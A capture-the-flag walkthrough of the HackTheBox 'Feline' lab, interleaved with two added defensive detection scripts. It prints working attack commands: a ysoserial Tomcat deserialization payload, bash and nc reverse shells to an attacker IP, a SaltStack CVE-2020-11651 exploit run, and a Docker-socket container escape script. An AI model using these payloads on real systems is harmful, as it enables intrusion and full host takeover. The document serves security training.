FELINE HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 12:13 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating Ping Scan at 12:14
Scanning 10.10.10.205 [4 ports]
Completed Ping Scan at 12:14, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:14
Scanning feline.htb (10.10.10.205) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.205
Discovered open port 22/tcp on 10.10.10.205
Completed SYN Stealth Scan at 12:14, 3.61s elapsed (1000 total ports)
Initiating Service scan at 12:14
Scanning 2 services on feline.htb (10.10.10.205)
Completed Service scan at 12:14, 8.85s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against feline.htb (10.10.10.205)
Retrying OS detection (try #2) against feline.htb (10.10.10.205)
Retrying OS detection (try #3) against feline.htb (10.10.10.205)
Retrying OS detection (try #4) against feline.htb (10.10.10.205)
Retrying OS detection (try #5) against feline.htb (10.10.10.205)
Initiating Traceroute at 12:14
Completed Traceroute at 12:14, 0.48s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:14
Completed Parallel DNS resolution of 2 hosts. at 12:14, 0.41s elapsed
NSE: Script scanning 10.10.10.205.
Initiating NSE at 12:14
Completed NSE at 12:14, 11.08s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 1.22s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Nmap scan report for feline.htb (10.10.10.205)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: VirusBucket
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 22.689 days (since Wed Aug 12 19:42:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   474.94 ms 10.10.14.1
2   475.12 ms feline.htb (10.10.10.205)

NSE: Script Post-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
           Raw packets sent: 1159 (55.038KB) | Rcvd: 1121 (48.462KB)

PORT 8080

HOME PAGE

SERVICE PAGE

The service page lets us upload files, so let's push an upload through Burp to see how the request looks.

The file uploads without trouble, but what matters is its destination. Some trial and error helps here: I just removed the filename from the request to see what happens, and the output looks like this:

Now we know the upload directory, and we know the web application runs on Tomcat, which is what we need to exploit. I found several resources that help with that.

We will use a Java deserialization attack against Tomcat to trigger the uploaded file. Before that, the file has to be uploaded with a .session extension, because the JSESSIONID cookie trick only loads files that end in .session.

Links where you can read about this and clone the repos:

https://medium.com/swlh/hacking-java-deserialization-7625c8450334

https://github.com/breaktoprotect/CVE-2017-12615

https://github.com/masahiro331/CVE-2020-9484

We also need to download the ysoserial jar file, from this link:

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

Get all these files, read through them, and then we will use the following commands.

USER ACCESS

First, let's build the Java payload with the session extension.

Start by creating the command to be executed:

echo "bash -i >& /dev/tcp/10.10.14.167/9002 0>&1" | base64

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}

In the two commands above we base64-encode the reverse shell so that the symbols and spaces in it do not cause errors; that is why base64 is used, and secondly it is the only way to get the command through the Java deserialization attack.

Second, create the file with the .session extension:

java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}" > liquidrage.session

This generates the session file with the ysoserial jar, which is a tool for creating deserialization payloads.

Now upload that session file through the web page,

and then trigger it to get our shell.

After uploading your file, run this command:

curl -sS 'http://feline.htb:8080/upload.jsp' -H "Cookie:JSESSIONID=../../../opt/samples/uploads/liquidrage" > /dev/null
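As an added detection example (my code, not the author's), the following flags JSESSIONID values that are not Tomcat-shaped session IDs and carry path-traversal characters, which is exactly the trigger used above. It assumes a Tomcat access log valve whose pattern includes "%{Cookie}i" so cookies are logged; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Tomcat's own session IDs are 32 hex chars, optionally followed by a
# ".route" suffix appended by a load balancer (e.g. "...A4F.node1").
VALID_SESSION_ID = re.compile(r"^[0-9A-Fa-f]{32}(\.[A-Za-z0-9_-]+)?$")
COOKIE_RE = re.compile(r"JSESSIONID=([^;\s\"]*)", re.IGNORECASE)

def extract_jsessionid(line):
    """Return the raw JSESSIONID value found in a log line, or None."""
    m = COOKIE_RE.search(line)
    return m.group(1) if m else None

def is_traversal_attempt(session_id):
    """True when the value is not a Tomcat-shaped ID and contains path
    characters. Decoding twice catches single and double URL-encoding."""
    decoded = unquote(unquote(session_id))
    if VALID_SESSION_ID.match(decoded):
        return False
    return ".." in decoded or "/" in decoded or "\\" in decoded

def scan_log(lines):
    """Return (line_number, decoded_session_id) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        sid = extract_jsessionid(line)
        if sid is not None and is_traversal_attempt(sid):
            hits.append((n, unquote(unquote(sid))))
    return hits

# Constructed sample access-log lines (not captured from the box); the
# assumed pattern is '%h %l %u %t "%r" %s %b "%{Cookie}i"'.
SAMPLE_LOG = [
    '10.10.14.5 - - [04/Sep/2020:12:30:01 +0000] "GET /service/ HTTP/1.1" 200 1523 "JSESSIONID=9C7B2A1F3E4D5C6B7A8F9E0D1C2B3A4F"',
    '10.10.14.5 - - [04/Sep/2020:12:31:12 +0000] "GET /upload.jsp HTTP/1.1" 500 0 "JSESSIONID=../../../opt/samples/uploads/liquidrage"',
    '10.10.14.5 - - [04/Sep/2020:12:31:40 +0000] "GET /upload.jsp HTTP/1.1" 500 0 "JSESSIONID=..%2F..%2F..%2Fopt%2Fsamples%2Fuploads%2Fx"',
    '10.10.14.5 - - [04/Sep/2020:12:32:05 +0000] "POST /upload.jsp HTTP/1.1" 200 210 "JSESSIONID=9C7B2A1F3E4D5C6B7A8F9E0D1C2B3A4F.node1"',
]

if __name__ == "__main__":
    for n, sid in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious JSESSIONID -> {sid}")
```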

My reverse shell

┌─[root@liquid]─[~/Desktop/HTB/feline]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 48714
bash: cannot set terminal process group (932): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@VirusBucket:/opt/tomcat$ id
id
uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)
tomcat@VirusBucket:/opt/tomcat$ cd
cd
tomcat@VirusBucket:~$ cat user.txt
cat user.txt
f50498c09383bb0c245da7098ebc5d3a
tomcat@VirusBucket:~$ 

That gives us USER ACCESS.

ROOT ACCESS

Let's check which ports are listening right now:

tomcat@VirusBucket:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:36533         0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN     
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN     
tcp6       0      0 :::8080                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tomcat@VirusBucket:~$ 

Ports 4505 and 4506 are the default SaltStack master ports.

Let's search for an exploit:

https://github.com/jasperla/CVE-2020-11651-poc

We have an exploit, but we can't run it from this shell because it needs Python modules we can't install there.

So, as usual, let's bring out chisel and forward the port to our machine.

To download and build chisel, follow along:

https://github.com/jpillora/chisel

Commands to build the chisel executable:

cd chisel

go build

Now you have chisel, but it is a large binary, so to shrink it:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #go build -ldflags="-s -w"
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #upx build chisel 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: build: FileNotFoundException: build: No such file or directory
   9555968 ->   3833252   40.11%   linux/amd64   chisel                        

Packed 1 file.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #du -hs chisel 
3.7M	chisel

Now transfer the binary to the target and bring up the server for the port forward.

tomcat@VirusBucket:/tmp$ chmod +x chisel
chmod +x chisel
tomcat@VirusBucket:/tmp$ ./chisel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
<isel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
2020/09/04 05:33:52 client: Connecting to ws://10.10.14.167:9004
2020/09/04 05:33:54 client: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 05:33:55 client: Connected (Latency 414.88223ms)

chisel server response

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #./chisel server -p 9004 --reverse
2020/09/04 10:57:19 server: Reverse tunnelling enabled
2020/09/04 10:57:19 server: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 10:57:19 server: Listening on http://0.0.0.0:9004
2020/09/04 10:57:23 server: session#1: tun: proxy#R:4506=>4506: Listening

Now let's run that script right away.

To run it we need the salt module:

pip3 install salt

Now let's get a shell as described in the PoC:

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec "nc 127.0.0.1 9005 -e /bin/sh" 
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute nc 127.0.0.1 9005 -e /bin/sh on 127.0.0.1
[+] Successfully scheduled job: 20200904055046865589
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec 'bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1"' 
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1" on 127.0.0.1
[+] Successfully scheduled job: 20200904055201158560

Above I tried nc, which didn't work, but the bash reverse shell worked perfectly.

My Reverse shell

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #nc -lnvp 9005
listening on [any] 9005 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 49746
bash: cannot set terminal process group (2095): Inappropriate ioctl for device
bash: no job control in this shell
root@2d24bf61767c:~#

But here we are inside a Docker container.

The bash history in this container references docker.sock, which is odd, and the container is also running an SSH server.

So we will create a new Docker container and mount all the data from the host into it, including root's files.

To do that I have a script which I had to take from my friend and understand.

#!/bin/bash
# Reverse shell the new container will run, wrapped so it executes inside
# a chroot of the host filesystem that gets mounted at /mnt
pay="bash -c 'bash -i >& /dev/tcp/10.10.14.167/9007 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
# Create a container from the existing "sandbox" image through the Docker
# API on docker.sock, bind-mounting the host root at /mnt read-write
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
# The create call returns {"Id":"<container id>",...}; the 4th "-delimited field is the Id
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
# Start the container, then pull its logs so any error from the command is visible
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

Transfer this script to the container, start your nc listener, and run the script.
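As an added defensive example (my code, not from the writeup), this audits the Docker Engine API's GET /containers/json output for bind mounts of the host root or the Docker socket, which is what the script above creates; the response body below is a constructed sample with shortened IDs, and on a host you administer you would feed it the output of curl --unix-socket /var/run/docker.sock http://localhost/containers/json?all=1 instead.

```python
import json

# Host paths that give a container control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")

def is_sensitive(path):
    """True if the host path is, or lies under, one of SENSITIVE_HOST_PATHS."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")

def risky_mounts(containers):
    """Return (short_id, image, source, destination, rw) for every bind mount
    whose host source is sensitive. Named volumes are ignored."""
    findings = []
    for c in containers:
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and is_sensitive(m.get("Source", "")):
                findings.append((c["Id"][:12], c.get("Image"), m["Source"],
                                 m.get("Destination"), bool(m.get("RW"))))
    return findings

def audit(containers_json):
    """Parse the JSON body of GET /containers/json?all=1 and report findings."""
    return risky_mounts(json.loads(containers_json))

# Constructed sample (not captured from the box) of the Engine API response,
# trimmed to the fields used here; container IDs are shortened to 12 chars.
SAMPLE_CONTAINERS_JSON = json.dumps([
    {"Id": "2d24bf61767c", "Image": "sandbox", "Mounts": []},
    {"Id": "1dfbcd626cdb", "Image": "sandbox", "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
    {"Id": "c0ffee000001", "Image": "nginx", "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True},
        {"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
         "Destination": "/usr/share/nginx/html", "RW": True}]},
])

if __name__ == "__main__":
    for short_id, image, src, dst, rw in audit(SAMPLE_CONTAINERS_JSON):
        print(f"{short_id} ({image}): host {src} mounted at {dst} rw={rw}")
```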

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #ssh root@127.0.0.1 -i id_rsa 
Linux 2d24bf61767c 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep  4 06:07:04 2020 from 127.0.0.1
root@2d24bf61767c:~# wget http://10.10.14.167/exploit.sh
--2020-09-04 06:15:01--  http://10.10.14.167/exploit.sh
Connecting to 10.10.14.167:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 641 [text/x-sh]
Saving to: 'exploit.sh'

exploit.sh                        100%[============================================================>]     641  --.-KB/s    in 0s      

2020-09-04 06:15:02 (45.0 MB/s) - 'exploit.sh' saved [641/641]

root@2d24bf61767c:~# chmod +x exploit.sh 
root@2d24bf61767c:~# ./exploit.sh 
root@2d24bf61767c:~# 

My Reverse Shell

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #nc -lnvp 9007
listening on [any] 9007 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 41764
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@1dfbcd626cdb:/cd
ls
cd
root@1dfbcd626cdb:~# ls
root.txt
snap
root@1dfbcd626cdb:~# cat ro	
cat root.txt 
2452ed5c64fdb7bf31ab09bf7a9b9140
root@1dfbcd626cdb:~# 

Here we go with our root flag

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
